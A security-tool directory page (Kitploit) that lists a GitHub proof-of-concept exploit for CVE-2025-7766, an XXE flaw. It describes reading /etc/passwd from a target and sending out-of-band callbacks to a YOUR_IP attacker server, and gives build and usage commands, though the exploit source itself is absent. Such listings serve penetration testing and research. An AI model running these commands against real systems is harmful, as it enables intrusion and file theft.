Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-7766 — PoC exploit for CVE-2025-7766 – XXE vulnerability leading to potential RCE. | Kitploit
Tools/GitHubGitHub/bytereaper77/cve-2025-7766
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload DevelopmentArchived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

PoC exploit for CVE-2025-7766 – XXE vulnerability leading to potential RCE.

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-7766 PoC Exploit

PoC for exploiting XML External Entity vulnerability in CVE-2025-7766. Demonstrates file read (/etc/passwd) and out-of-band HTTP callbacks.

Author: Byte Reaper

CVE: CVE-2025-7766

Vulnerability: Remote Code Execution via XML External Entity (XXE)


PoC for exploiting XXE in CVE-2025-7766. Demonstrates:

  • Reading /etc/passwd from the target.
  • Triggering out-of-band HTTP request to your server.

Requirements

  • gcc
  • libcurl
  • argparse library

Build

root@kitploit:~
gcc -o exploit exploit.c argparse.c -lcurl

Usage

root@kitploit:~
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v

LICENSE:

MIT

Download Tool